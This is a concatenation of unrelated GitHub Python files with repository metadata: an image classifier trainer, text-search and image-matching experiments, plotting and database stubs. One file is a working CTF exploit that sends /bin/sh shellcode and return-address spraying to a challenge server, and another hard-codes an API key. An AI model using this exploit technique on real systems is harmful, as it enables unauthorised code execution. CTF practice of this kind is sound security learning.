        # return; fail with an explicit message instead.
        raise ValueError("Unsupported architecture: {}".format(arch))
    return model
def classifier(model, hidden_units):
    """Replace ``model.classifier`` with a fresh 102-way flower classifier.

    Args:
        model: a torchvision model exposing a ``classifier`` Sequential
            (e.g. vgg16 or alexnet).
        hidden_units: size of the hidden layer; defaults to 512 when None.

    Returns:
        (classifier, model.classifier) — both refer to the same new module,
        mirroring the original interface.
    """
    if hidden_units is None:  # was ``== None``; identity check is idiomatic
        hidden_units = 512
    # Bug fix: indexing ``model.classifier[0]`` directly breaks for alexnet,
    # whose first classifier layer is Dropout (no .in_features). Scan for the
    # first Linear layer to obtain the input feature count instead.
    first_linear = next(m for m in model.classifier if isinstance(m, nn.Linear))
    input_features = first_linear.in_features
    new_classifier = nn.Sequential(OrderedDict([
        ('fc1', nn.Linear(input_features, hidden_units)),
        ('relu', nn.ReLU()),
        ('drop', nn.Dropout(p=0.2)),
        ('fc2', nn.Linear(hidden_units, 102)),
        ('output', nn.LogSoftmax(dim=1))]))
    model.classifier = new_classifier
    return new_classifier, model.classifier
'''def device():
use_gpu = torch.cuda.is_available()
if args.gpu:
if use_gpu:
model = model.cuda()
print ("Using GPU: "+ str(use_gpu))
else:
print("Using CPU because GPU is not available")'''
# Training Network(model) with the training dataset
#for i in keep_awake(range(1)):
def train_model(epochs, dataloaders_train, dataloaders_valid, device, model, optimizer, criterion):
    """Train ``model``, running a validation pass every ``print_every`` steps.

    Args:
        epochs: number of passes over the training set.
        dataloaders_train / dataloaders_valid: iterables of (images, labels) batches.
        device: torch device to train on.
        model: network to train.
        optimizer: optimizer over the trainable parameters.
        criterion: loss expecting log-probabilities (e.g. nn.NLLLoss).

    Returns:
        The trained model.
    """
    # Bug fix: the original body reassigned ``epochs = 10`` here, silently
    # ignoring the caller-supplied value (e.g. the --epochs CLI flag).
    running_loss = 0
    print_every = 100
    steps = 0
    train_losses, valid_losses = [], []
    # Move the model once, before the loops (was done per batch).
    model.to(device)
    for epoch in range(epochs):
        for images, labels in dataloaders_train:
            steps += 1
            images, labels = images.to(device), labels.to(device)
            optimizer.zero_grad()
            logps = model.forward(images)
            train_loss = criterion(logps, labels)
            train_loss.backward()
            optimizer.step()
            running_loss += train_loss.item()
            if steps % print_every == 0:
                model.eval()
                valid_loss = 0
                accuracy = 0
                # Turn gradients off for the validation pass (faster, less memory).
                with torch.no_grad():
                    for images, labels in dataloaders_valid:
                        images, labels = images.to(device), labels.to(device)
                        logps = model(images)
                        loss = criterion(logps, labels)
                        valid_loss += loss.item()
                        ps = torch.exp(logps)
                        top_p, top_class = ps.topk(1, dim=1)
                        equals = top_class == labels.view(*top_class.shape)
                        accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
                train_losses.append(running_loss / len(dataloaders_train))
                valid_losses.append(valid_loss / len(dataloaders_valid))
                print(f"Epoch {epoch+1}/{epochs}.. "
                      f"Train loss: {running_loss/len(dataloaders_train):.3f}.. "
                      f"Valid loss: {valid_loss/len(dataloaders_valid):.3f}.. "
                      f"Accuracy: {accuracy/len(dataloaders_valid):.3f}")
                running_loss = 0
                model.train()
    return model
# testing network
def test_network(model, dataloaders_test, device, criterion):
test_loss = 0
accuracy = 0
model.eval()
with torch.no_grad():
for images, labels in dataloaders_test:
images, labels = images.to(device), labels.to(device)
logps = model(images)
test_loss += criterion(logps, labels)
ps = torch.exp(logps)
top_p, top_class = ps.topk(1, dim=1)
equals = top_class == labels.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor))
print(f"Test accuracy: {accuracy/len(dataloaders_test):.3f}")
# saving model checkpoint
def save_checkpoint(model, image_datasets_train, checkpoint, arch, epochs):
    """Persist the trained model plus metadata to the path *checkpoint*.

    Fixes: the *checkpoint* path argument is now honoured (the original
    ignored it and saved to the global ``args.checkpoint``), and the local
    state dict no longer shadows the path parameter.
    """
    # mapping classes to indices the network was trained with
    model.class_to_idx = image_datasets_train.class_to_idx
    state = {'arch': arch,
             'classifier': model.classifier,
             'state_dict': model.state_dict(),
             'class_to_idx': model.class_to_idx,
             'epochs': epochs,
             # NOTE(review): `optimizer` is read from module scope; pass it
             # in explicitly if this function is reused outside this script.
             'optimizer_state_dict': optimizer.state_dict(),
             # NOTE(review): hard-coded default lr — keep in sync with args.lr
             'lr': 0.001}
    return torch.save(state, checkpoint)
if __name__ == '__main__':
    # Command-line interface for the flower-classifier training script.
    paser = argparse.ArgumentParser(description='training image classifier for flowers')
    paser.add_argument('data_dir', type=str, default='flowers', help='dataset directory')
    # NOTE(review): argparse `type=bool` is a known trap — bool('False') is
    # True, so --gpu effectively cannot be disabled from the command line.
    paser.add_argument('--gpu', type=bool, default='True', help='True: gpu, False: cpu')
    paser.add_argument('--epochs', type=int, default=10, help='number of epochs')
    paser.add_argument('--lr', type=float, default=0.001, help='learning rate')
    paser.add_argument('--arch', type=str, default='vgg16', help='type of model architecture to be used')
    paser.add_argument('--hidden_units', type=int, default=512, help='hidden units for classifier/Network layer')
    paser.add_argument('--checkpoint', type=str, default='checkpoint.pth', help='save trained model to a file')
    args = paser.parse_args()
    #device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    #model.to(device);
    # Select CUDA only when both requested and available.
    is_gpu = args.gpu
    use_cuda = torch.cuda.is_available()
    device = torch.device("cpu")
    if is_gpu and use_cuda:
        device = torch.device("cuda:0")
        print(f"Device set to {device}")
    else:
        device = torch.device("cpu")
        print(f"Device set to {device}")
    # process_data / pretrained_model / classifier are defined earlier in this file.
    dataloaders_train, dataloaders_valid, dataloaders_test, image_datasets_train, image_datasets_valid, image_datasets_test = process_data(args.data_dir)
    model = pretrained_model(args.arch)
    # Freeze the pretrained feature extractor; only the classifier is trained.
    for param in model.parameters():
        param.requires_grad = False
    classsifier, model.classifier = classifier(model, args.hidden_units)
    criterion = nn.NLLLoss()
    optimizer = optim.Adam(model.classifier.parameters(), lr = args.lr)
    model = train_model(args.epochs, dataloaders_train, dataloaders_valid, device, model, optimizer, criterion)
    test_network(model, dataloaders_test, device, criterion)
    save_checkpoint(model, image_datasets_train, args.checkpoint, args.arch, args.epochs)
    print('Done')
| [
"noreply@github.com"
] | A-Nuru.noreply@github.com |
26f153d845a72b60f17dd0f6548f21fd4e613a28 | c9ec4dca0bb6b487f09b8f62ce175b303302e4ab | /Python Scripts/TextProcess.py | 2e9bba5119b21394c3e2538810404102d2b6c35f | [] | no_license | dr-jgsmith/orphans | 92c49ec671b62264369a004f2875ba6f0f8224dd | d0dc6c6cfd9515cff8eaa98ea2a5d291368cd077 | refs/heads/master | 2021-01-20T08:06:21.519660 | 2017-05-13T07:14:53 | 2017-05-13T07:14:53 | 90,094,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,070 | py | # -*- coding: utf-8 -*-
"""
seed_search
Created on Tue Nov 22 01:10:08 2016
@author: smith
"""
import os
import csv
import requests
import json
import numpy as np
from textblob import TextBlob
import networkx as nx
from bitarray import bitarray
import nltk, re
from gensim import corpora, models, similarities
import scholarly
import wikipedia
import matplotlib.pyplot as plt
from itertools import tee
from collections import defaultdict
from pprint import pprint
class TextProcessor:
    """Tokenise, tag, chunk and graph text; several SDR/bit-encoding
    methods below are experimental and not fully working (see notes)."""
    def __init__(self):
        # Accumulators shared across the processing pipeline.
        self.sentList = []
        self.corp = []
        self.com_seq = []
        self.edges = []
        self.bin_set = []
        self.text_sdr = []
        self.stage = []
        # Words/symbols dropped before tagging.
        self.stop_list = ['for', 'a', 'the', 'to', 'too', '"drop', 'in', 'but', 'am', 'ie', 'i.e.', 'of', 'I', ']', '[', '...', '–', '-', '____', '___', ',' , '+', '/w', '>']
        self.alphabet = []
    def getFileType(self, filename):
        """Return the extension (including the dot) of *filename*."""
        self.filename = filename
        self.filepath, self.file_extension = os.path.splitext(self.filename)
        return self.file_extension
    def tag_text(self, text):
        """Lemmatise, lower-case and POS-tag *text*; append to sentList."""
        self.text = text
        t = TextBlob(self.text)
        # keep only non-stop-words longer than 2 characters
        self.seq2 = [k[0].lemmatize().lower() for k in t.tags if k[0] not in self.stop_list if len(k[0]) > 2]
        self.test = ' '.join(self.seq2)
        self.r = TextBlob(self.test)
        self.sentence = self.r.tags
        self.sentList.append(self.sentence)
        return self.sentList
    def np_chunker(self):
        """Extract noun-phrase chunks from the last tagged sentence."""
        self.grammar = """
            NP: {<N.+>?<J.+>?<V.+>*<N.+>+}
            """
        cp = nltk.RegexpParser(self.grammar)
        self.result = cp.parse(self.sentence)
        for i in self.result:
            self.seq = []
            print("Printing i: ", i)
            for j in i:
                print("Printing j: ",j[0])
                self.seq.append(j[0])
            self.com_seq.append(self.test)
            self.com_seq.append(self.seq)
        self.trans_doc = [x for x in self.com_seq if len(x[0]) > 2]
        print(self.trans_doc)
        return self.trans_doc
    def sparse_vec(self):
        """Build a gensim dictionary and bag-of-words corpus from trans_doc."""
        self.frequency = defaultdict(int)
        for text in self.trans_doc:
            print("Printing... ", text)
        self.dictionary = corpora.Dictionary(self.trans_doc)
        self.dictionary.save('data_dump.dic')
        self.dictionary.token2id
        self.corpus = [self.dictionary.doc2bow(text) for text in self.trans_doc]
    def word2sdr(self):
        # NOTE(review): experimental — np.binary_repr expects an integer, but
        # self.bi is a string of bits here; this method likely raises.
        for i in self.trans_doc:
            for j in i:
                self.bi = ''.join('{0:064b}'.format(ord(x), 'b') for x in j)
                print(j, self.bi)
                self.x = np.binary_repr(self.bi)
                print(self.x)
                self.bin_set.append(self.bi)
    def genet_sem(self):
        """Print a space-separated 64-bit binary encoding of each token."""
        for i in self.trans_doc:
            for j in i:
                self.bin_letter = ' '.join('{0:064b}'.format(ord(x), 'b') for x in j)
                print(self.bin_letter)
    def text2sdr(self):
        # NOTE(review): int(j[0]) parses the bit-string as a *decimal* number;
        # int(j[0], 2) was presumably intended — confirm before relying on this.
        j = self.bin_set
        x = int(j[0])
        y = int(j[1])
        print(x, y)
        merge = x&y
        print(merge)
        #pprint(self.union)
    def convenrt2bit(self):
        """Append each token (plus a space) to one bitarray; prints progress."""
        a = bitarray()
        for i in self.trans_doc:
            for j in i:
                self.n = j + ' '
                a.fromstring(self.n)
                print(self.n, a)
    def learnAlphaB(self):
        # NOTE(review): broken — dok_matrix is never imported in this file.
        a = bitarray()
        for i in self.trans_doc:
            for j in i:
                split = list(j)
                for x in split:
                    print(x)
                    a.fromstring(x)
                    self.spr_l = dok_matrix(a)
                    print(self.spr_l)
                break
    def lda_model(self, topics):
        """Fit an LDA topic model over the corpus and print its topics."""
        self.topics = topics
        self.lda = models.LdaModel(self.corpus, id2word=self.dictionary, num_topics=self.topics)
        self.corp_lda = self.lda[self.corpus]
        for doc in self.corp_lda:
            print(doc)
        print(self.lda.print_topics(self.topics))
    # Edges record directed co-occurrence of adjacent tokens; they drive the
    # document "fingerprint" graphs below.
    def get_edges(self):
        """Collect (token, next_token) pairs from every sequence in trans_doc."""
        for j in self.trans_doc:
            a, b = tee(j)
            next(b, None)               # offset the second iterator by one
            self.pairs = zip(a, b)
            for i in self.pairs:
                print(i)
                self.edges.append(i)
    def get_edge_graph(self):
        """Draw the co-occurrence edges as a spring-layout digraph."""
        G = nx.DiGraph()
        G.add_edges_from(self.edges)
        #nx.draw(G, with_labels=True)
        nx.draw_spring(G,node_size=1, with_labels=True, edge_color='b',alpha=.2,font_size=10)
        plt.show()
    def get_path_graph(self):
        """Draw each token sequence as a path in one spring-layout digraph."""
        G = nx.DiGraph()
        for j in self.trans_doc:
            G.add_path(j)
        #nx.draw(G, with_labels=True)
        nx.draw_spring(G,node_size=0,with_labels=True,edge_color='b',alpha=.2,font_size=10)
        plt.show()
class TextSearch:
    """Fetch text about *term* from scholar / news / web / wikipedia sources.

    NOTE(review): a Faroo API key is hard-coded below — move it to
    configuration before publishing this code.
    """
    def __init__(self, term):
        # term: the search phrase (a string)
        self.term = term
    def search_scholar(self):
        """Print the first Google Scholar result for the term."""
        search_query = scholarly.search_pubs_query(self.term)
        self.result = next(search_query).fill()
        print(self.result)
    def search_news(self):
        """Query the Faroo news API and print result titles."""
        # NOTE(review): iterating a string issues one request per *character*
        # of the term and never uses `item` — probably unintended.
        for item in self.term:
            base = "http://www.faroo.com/api?q="
            connector = "&start=1&length=10&l=en&src=news&f=json"
            api_key = "&key=NWPsWfgdnoKG8KLL56rzN8Zosbk_"
            search = base+self.term+connector+api_key
            r = requests.get(search)
            self.news_text = r.text
            if self.news_text == "<h1>HTTP/1.1 429 Rate limit exceeded</h1>":
                pass
            else:
                print(self.news_text)
                self.news = json.loads(self.news_text)
                print(self.news)
                for i, entry in enumerate(self.news['results']):
                    print(entry['title'])
    def search_web(self):
        """Query the Faroo web-search API and print result titles."""
        # NOTE(review): same per-character loop issue as search_news.
        for item in self.term:
            base = "http://www.faroo.com/api?q="
            connector = "&start=1&length=10&l=en&src=web&f=json"
            api_key = "&key=NWPsWfgdnoKG8KLL56rzN8Zosbk_"
            search = base+self.term+connector+api_key
            r = requests.get(search)
            #self.web_text = str(r.content, 'cp437', errors='ignore')
            self.web_text = r.text
            if self.web_text == "<h1>HTTP/1.1 429 Rate limit exceeded</h1>":
                pass
            else:
                print(self.web_text)
                self.web = json.loads(self.web_text)
                print(self.web)
                for i, entry in enumerate(self.web['results']):
                    print(entry['title'])
    def search_wiki(self):
        """Return (and print) the Wikipedia summary for the term."""
        self.summary = wikipedia.summary(self.term)
        print(self.summary)
        return self.summary
    def recurse_search(self, depth):
        # Stub: stores the requested recursion depth; no search performed yet.
        self.depth = depth
#Basic usage:
s = TextSearch("climate change")
#Define where to search, i.e. wikipedia, google scholar, news, etc.
text = s.search_wiki()
data = TextProcessor()
data.tag_text(text)
data.np_chunker()
data.get_edges()
data.get_path_graph()
"""
data.get_edges()
data.get_graph()
start project
search by topic
Get doc list
Save metadata to db - including url
retrieve url
convert document into raw text
process text
retrieve word/sequence list
elif self.file_extension == '.pdf':
parsePDF()
elif self.file_extension == '.csv':
parseDOC()
elif self.file_extension == '.html':
parseHTML()
"""
| [
"justin.smith@directharvest.io"
] | justin.smith@directharvest.io |
066fe43ee93544352a40330172dc00d56e591351 | e4477741d0f1457a0eb3835766e89c7c39b47c81 | /sandbox_2.py | aba6b6a976390a62ffa5f69dbcf789aab2bb703d | [] | no_license | wtnbKAZUFUMI/imageSimulation | 79a176bd2e26c38d2be86afdf97a144d8b3862b1 | 72cb66ca8fbac186e74d6cfc1bcfa16d9726aac6 | refs/heads/master | 2021-01-19T14:52:34.426100 | 2017-08-25T11:26:41 | 2017-08-25T11:26:41 | 100,933,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,091 | py |
import os
import pyfits
import cv2
import matplotlib.pyplot as plt
import numpy
import math
import random
dataset_dir = "../results/convolution/000/longExposure/"
target_number = 971
def loadDataSet(dataset_dir):
    """Read every file in *dataset_dir* as a grayscale OpenCV image.

    macOS Finder droppings (".DS_Store") are excluded from the listing.
    """
    entries = [name for name in os.listdir(dataset_dir) if name != ".DS_Store"]
    return [cv2.imread(dataset_dir + name, cv2.IMREAD_GRAYSCALE) for name in entries]
def errorListFromSADMethod(dataset , data):
    """Sum of absolute differences (SAD) of *data* against each dataset image."""
    return [numpy.abs(data - element).sum() for element in dataset]
def MyerrorListFromSADMethod(dataset , data):
    """SAD of *data* vs each dataset image, normalised by data's total intensity."""
    total = data.sum()
    scores = []
    for element in dataset:
        sad = numpy.abs(data - element).sum()
        scores.append(float(sad) / total)
    return scores
def errorListFromSSDMethod(dataset , data):
    """Sum of squared differences (SSD) of *data* against each dataset image.

    Fixes: the original squared the *summed* absolute error, i.e. computed
    (sum|d|)^2 rather than sum(d^2), which is not SSD; it was also subject to
    uint8 wraparound on image subtraction.  Differences are now taken in
    int64 and squared element-wise before summing.
    """
    ref = data.astype(numpy.int64)
    return [float(((ref - element.astype(numpy.int64)) ** 2).sum()) for element in dataset]
def errorListFromNCCMethod(dataset, data):
    """Normalised cross-correlation of *data* with each dataset image.

    NaN scores (all-zero images) are replaced by 0.0.
    """
    data_norm = math.sqrt(numpy.multiply(data, data).sum())
    scores = []
    for element in dataset:
        cross = numpy.multiply(element, data).sum()
        denom = math.sqrt(numpy.multiply(element, element).sum()) * data_norm
        score = cross / denom
        scores.append(score if not math.isnan(score) else 0.0)
    return scores
def errorListFromZNCCMethod(dataset, data):
    """Zero-mean normalised cross-correlation (ZNCC) of *data* against every
    dataset image; NaN scores are replaced by 0.0.  (Python 2 module.)"""
    m = data.shape[0]
    n = data.shape[1]
    # m*n*sum(xy) - sum(x)sum(y) over sqrt of the per-image variances
    error = [(m*n*numpy.multiply(dataset_element,data).sum() - dataset_element.sum()*data.sum())/math.sqrt((m*n*numpy.multiply(dataset_element,dataset_element).sum() - math.pow(dataset_element.sum(),2)) * (m*n*numpy.multiply(data,data).sum() - math.pow(data.sum(),2))) for dataset_element in dataset]
    # Debug: report any score above the theoretical maximum of 1.0.
    for ind,val in enumerate(error):
        if val > 1.0:
            print str(ind) + " : " + str(val)
    error_alt = [i if not math.isnan(i) else 0.0 for i in error]
    return error_alt
def errorListFromSIFTMethod(dataset, data):
    """Match SIFT descriptors between dataset[500] and *data*.

    NOTE(review): incomplete — the matches are computed but never scored or
    returned, so callers currently receive None.
    """
    sift = cv2.SIFT()
    kp_1, des_1 = sift.detectAndCompute(dataset[500], None)
    kp_2, des_2 = sift.detectAndCompute(data, None)
    matcher = cv2.DescriptorMatcher_create("FlannBased")
    matches = matcher.match(des_1,des_2)
def errorListFromLuminance(dataset, data):
    """Absolute difference in total intensity between *data* and each image."""
    target = float(data.sum())
    return [abs(target - float(element.sum())) for element in dataset]
def makeRankList(error_list):
    """Return the indices of *error_list*, grouped by ascending error value.

    Fix: the original computed ``list(set(sorted(error_list)))`` — converting
    to a set *after* sorting, so the iteration order of the distinct values
    was unspecified.  Values are now deduplicated first and sorted second.
    """
    ans = []
    for value in sorted(set(error_list)):
        for ind, val in enumerate(error_list):
            if val == value:
                ans.append(ind)
    return ans
def eliteSelect(error_sad, tolerance_ratio = 1.0):
    """Indices of entries whose error does not exceed *tolerance_ratio*."""
    return [ind for ind, val in enumerate(error_sad) if val <= tolerance_ratio]
def chrVector(error_mysad_elite , error_zncc_elite):
    """Pair the two elite error lists element-wise into 2-vectors."""
    vectors = []
    for idx in range(len(error_mysad_elite)):
        vectors.append(numpy.array([error_mysad_elite[idx], error_zncc_elite[idx]]))
    return vectors
def proto_chrVector(error_mysad_elite , error_zncc_elite , elite , target_number):
    """2-vectors of (mysad, zncc) errors, re-centred on the target entry.

    The target is located by finding *target_number* inside *elite*.
    """
    pos = elite.index(target_number)
    target = numpy.array([error_mysad_elite[pos], error_zncc_elite[pos]])
    vectors = []
    for idx in range(len(error_mysad_elite)):
        vectors.append(numpy.array([error_mysad_elite[idx], error_zncc_elite[idx]]) - target)
    return vectors
def ranking(mag, elite):
    """Order the *elite* labels by ascending magnitude in *mag*.

    Positions of equal magnitudes are emitted in list order; a position
    beyond the end of *elite* is silently skipped (matching the original
    index-matching loop).
    """
    ordered_positions = []
    for value in sorted(set(mag)):
        for pos, m in enumerate(mag):
            if m == value:
                ordered_positions.append(pos)
    result = []
    for pos in ordered_positions:
        if pos < len(elite):
            result.append(elite[pos])
    return result
def rankToDeg(rank):
    """Decode each rank index into an (a, b, c) degree triple.

    Digits are taken base-10/100 and scaled by 36 degrees per step.
    Fixes: removed a dead ``numpy.array([a, b, c])`` whose result was
    discarded, and made the integer division explicit with ``//`` (identical
    to ``/`` under this module's Python 2, and correct under Python 3).
    """
    delta_deg = 36
    ans = []
    for i in rank:
        a = (i // 100) * delta_deg
        b = (i % 100) // 10 * delta_deg
        c = ((i % 100) % 10) * delta_deg
        ans.append(numpy.array([a, b, c]))
    return ans
def degs3DPlot(degs):
    """Scatter-plot the first 100 (a, b, c) degree triples as two 2-D views
    (a-vs-b and a-vs-c) side by side."""
    degs = degs[0:100:1]
    x = [deg[0] for deg in degs]
    y = [deg[1] for deg in degs]
    z = [deg[2] for deg in degs]
    plt.subplot(121)
    plt.scatter(x, y)
    plt.subplot(122)
    plt.scatter(x, z)
    plt.show()
def nccTest(im_1, im_2):
    """Step-by-step trace of the NCC computation for two images.

    Python 2 debugging helper: prints every intermediate term.
    """
    #im_1 = numpy.array([[1,2,3],[4,5,6],[7,8,9]])
    #im_1 = numpy.array([[9,8,7],[6,5,4],[3,2,1]])
    #im_2 = numpy.array([[9,8,7],[6,5,4],[3,2,1]])
    #print (im_1 * im_2).tolist()
    #print numpy.sum(im_1 * im_2)
    # round-trip through tolist() to force plain Python ints (avoids uint8 overflow)
    im_1 = numpy.array(im_1.tolist())
    im_2 = numpy.array(im_2.tolist())
    print im_1
    print im_2
    a = numpy.sum(im_1 * im_2)
    b = numpy.sum(im_1 * im_1)
    print b
    c = numpy.sum(im_2 * im_2)
    print c
    d = math.sqrt(b*c)
    print d
    err = a/d
    print err
def sadTest(im_1, im_2):
    """Step-by-step trace of the SAD computation for two images.

    Python 2 debugging helper: prints every intermediate term.
    """
    im_1 = numpy.array(im_1.tolist())
    im_2 = numpy.array(im_2.tolist())
    print im_1
    print im_2
    print im_1 - im_2
    print numpy.abs(im_1 - im_2)
    print numpy.sum(numpy.abs(im_1 - im_2))
dataset = loadDataSet()
member = range(len(dataset))
err = MyerrorListFromSADMethod(dataset, dataset[100])
#a = cv2.resize(dataset[3542] , (10 , 15))
#b = cv2.resize(dataset[971] , (10 , 15))
sadTest(a, b)
#print ZNCC(dataset[3542], dataset[971])
'''
dataset = loadDataSet()
member = range(len(dataset))
error_mysad = MyerrorListFromSADMethod(dataset , dataset[target_number])
error_sad = errorListFromSADMethod(dataset , dataset[target_number])
error_ssd = errorListFromSSDMethod(dataset , dataset[target_number])
error_ncc = errorListFromNCCMethod(dataset , dataset[target_number])
error_zncc = errorListFromZNCCMethod(dataset , dataset[target_number])
error_sift = errorListFromSIFTMethod(dataset , dataset[target_number])
error_luminance = errorListFromLuminance(dataset, dataset[target_number])
a = error_mysad
b = numpy.array(error_zncc)
elite = eliteSelect(error_mysad, tolerance_ratio = 1.0)
a = [a[i] for i in elite]
b = [b[i] for i in elite]
plt.scatter(a, b)
plt.show()
ch_vector = proto_chrVector(a , b , elite , target_number)
#for i in ch_vector:
# print i
mag = [abs(i[1]) for i in ch_vector]
#print mag
plt.plot(range(len(a)) , sorted(mag) , "o" , markersize=7)
plt.show()
rank = ranking(mag,elite)
#for i in rank:
# print (i)
# print error_zncc[i]
#degs = rankToDeg(rank)
#for i in degs:
# print i
#degs3DPlot(degs)
'''
| [
"31205208+wtnbKAZUFUMI@users.noreply.github.com"
] | 31205208+wtnbKAZUFUMI@users.noreply.github.com |
f846c2645161849b6c1e7ffa56c7225013e7d047 | 06c06465ef0b7c3e080859bf9c161155349a4d0c | /software/generatore_numeri_causaly.py | ae5f2e2f8c5f2806ce2aeec9366f9be629c1a451 | [] | no_license | Flecart/Olicyber2021 | e296ea54566c7912c939e4e1119b669cd6f37a32 | 3fb161a0ce8ce1c4269aae3290c5588ce621f638 | refs/heads/main | 2023-06-22T12:05:25.184420 | 2021-07-21T09:23:05 | 2021-07-21T09:23:05 | 388,059,404 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,261 | py | #! /usr/bin/env python3
# WRITEUP
# il programma della challenge genera un buffer di valore causale
# il problema e che mi ritorna l' indirizzo del buffer, che devo quindi eseguire
# in qualche modo
# allora io mi carico tutto e per tutti gli indirizzi in cui puo saltare gli mando
# lindirizzo in cui si trova la shell, quindi 125 posizioni possibili tutte portano alla shell
# sono quasi sicuro che quando salta vada alla shell quindi e fatta
from pwn import *
# CTF exploit script (pwntools): the remote service leaks a stack address;
# we send shellcode plus 140 copies of a return address so that whatever
# slot the program jumps through lands on the shellcode.
processo = ELF('./generatore_poco_casuale')
# conn = process(processo.path)
conn = remote('gpc.challs.olicyber.it',10104)
context.terminal = ['terminator', '-e']
# gdb.attach(conn, """
# b *0x00101257
# c
# """)
# x86-64 execve("/bin/sh") shellcode
shell = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
conn.recvuntil('casuale: ')
# the service prints the buffer address in decimal after "casuale: "
stack = int(conn.recvline().strip().decode())
conn.recvline()
print(stack)
local_28 = p64(stack)
exploit = p64(stack + 1)    # skip the leading 's' marker byte
payload = b's'+ shell+ b'\x00'*4 + exploit *140
# sleep(1)
conn.sendline(payload)
print(payload)
conn.sendline('s') # not sure why 's' has to be sent again, but it works
conn.interactive()
# flag{pr3nd1_1l_c0ntr0ll0_d4_un_1nd1r1zz0}
# with open('/tmp/prova.txt', 'wb') as f:
#     f.write(payload)
| [
"huangelo02@gmail.com"
] | huangelo02@gmail.com |
16b33380593d3b19adac35f8065445f8e0af71b0 | b55c72bc94c6464a1b4461a3d11051f7dce98cd4 | /source/053.py | 37a6c46efa8ba1390c36fdc1702d16b756abdb8e | [] | no_license | ilkerkesen/euler | d886a53d3df3922e4ddaff6ab9b767e547c0eca2 | b9e54412492cfcee9dbf5a017cf94e5da65ad0d3 | refs/heads/master | 2020-05-21T12:49:31.939194 | 2016-08-14T17:25:17 | 2016-08-14T17:25:17 | 6,717,398 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from operator import mul
LIMIT = 1000000
def ncr(n, r):
    """Binomial coefficient C(n, r), computed with explicit running products.

    Uses the symmetry C(n, r) == C(n, n-r) to shorten the products; the
    division is exact, so floor division preserves the value.
    """
    r = min(r, n-r)
    if r == 0:
        return 1
    numer = 1
    for factor in range(n, n - r, -1):
        numer *= factor
    denom = 1
    for factor in range(1, r + 1):
        denom *= factor
    return numer // denom
def main():
    """Count pairs (n, r), 1 <= n <= 100, with C(n, r) > LIMIT (Project Euler 53)."""
    result = 0
    for n in range(1, 101):
        for r in range(n+1):
            if ncr(n, r) > LIMIT:
                result += 1
    print result
if __name__ == "__main__":
    main()
| [
"ilkerksn@gmail.com"
] | ilkerksn@gmail.com |
56283c8a9ba0b97fe7da7b90c3b70341a3176af6 | 56e694eccce264be2d6b789bccaac4cf5326be8e | /cython/demoforroot.py | 1bf9cb0095d843410442f2fc76bc30219c5bf0a8 | [] | no_license | kanouyou/CometQuenchCode- | cddb56b6d6017435afa3183f2ff6d834395c448c | aaa2cb3af3da776eac04be39a537ae51b1beae1d | refs/heads/master | 2020-05-21T16:27:35.639423 | 2017-04-07T09:07:35 | 2017-04-07T09:07:35 | 64,641,031 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,658 | py | #!/usr/bin/env python
import os
import sys
sys.path.append("/home/yeyang/Documents/software/CometQuenchCode-/cython")
import matplotlib.pyplot as plt
import XPostRootLoad as pt
import XPostOutput
import XRootFiles
def usage():
    """Print the expected command-line invocation (Python 2 script)."""
    print "usage:"
    print "  /path/demoforroot -m magnet -g geofile -d datafile"
def Draw(ax, geofile, datafile, magnet, Tmin, Tmax):
    """Render one magnet's temperature map onto the matplotlib axes *ax*.

    Tmin/Tmax fix the colour scale so all magnets share one range.
    """
    plot = pt.XPost2dPlot(geofile, datafile, magnet)
    plot.SetMatInfo(pt.kTemperature)
    #plot.SetMatInfo(pt.kVoltage)
    plot.SetDirection(pt.kZ)
    plot.SetPhi(1)
    #plot.SetColorMap("nipy_spectral")
    #plot.SetColorMap("rainbow")
    plot.SetRange(Tmin, Tmax)
    plot.DrawThis(ax)
    ax.set_title(magnet)
if __name__=="__main__":
magnet = ["CS0", "CS1", "MS1", "MS2"]
geofile = ["geo%s.dat" %magnet[0], "geo%s.dat" %magnet[1], "geo%s.dat" %magnet[2], "geo%s.dat" %magnet[3]]
datafile = sys.argv[1]
rfile = XRootFiles.XRootFiles(datafile)
rfile.SetSubDirectory(magnet)
Tmax = rfile.FindMaxTemp()
Tmin = rfile.FindMinTemp()
path = os.path.abspath(os.getcwd()+"/output")
out = XRootFiles.XRootOutput(path)
out.SetCoilPosition("CS1", 24, 1, 2)
out.ConstructFigure()
out.Plot("T")
plt.show()
fig, ax = plt.subplots(2, 2, figsize=(12,6))
for i in range(len(magnet)):
Draw(ax[i/2][i%2], geofile[i], datafile, magnet[i], Tmin, Tmax)
plt.tight_layout()
#plt.savefig("temp.pdf")
plt.show()
"""
plot = pt.XPost2dPlot(geofile, datafile, magnet)
plot.SetMatInfo(pt.kTemperature)
plot.SetDirection(pt.kZ)
plot.SetPhi(1)
plot.SetRange(4.5, maxi)
plot.Draw()
"""
| [
"kanouyou@kune2a.nucl.kyushu-u.ac.jp"
] | kanouyou@kune2a.nucl.kyushu-u.ac.jp |
fede69e240d8da8f2e4e2f83df931bcd50f79606 | 4b12c5460583f445e0a4d8ac1ecc5b245d8ea3e3 | /pms/access/cpd.py | 16773d166da4a15df29705b5418e9e2ef13985fb | [] | no_license | idksoftware/pms | b5fd7fe402785c4ad7586a22822d13310dd0b234 | f5a1bdf6c4febe81b501d1b50b3fdc85029c7be0 | refs/heads/master | 2020-06-25T12:45:07.940784 | 2019-09-12T16:33:44 | 2019-09-12T16:33:44 | 199,311,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,196 | py | '''
Created on Jan 28, 2014
@author: wzw7yn
'''
import sqlite3 as lite
import sys
from access.database import Database
from sqlbuilder import SqlSelectBuilder
from sqlbuilder import SqlInsertBuilder
from sqlbuilder import SqlUpdateBuilder
from sqlbuilder import SqlSingleWhereBuilder
class CPDTable(Database):
    """Data-access helper for the ``cpd`` table.

    Table layout:
        cpd_id integer primary key,
        title varchar,
        date_started datetime not null,
        days_taken int,
        activity_type varchar(100),
        category varchar(100),
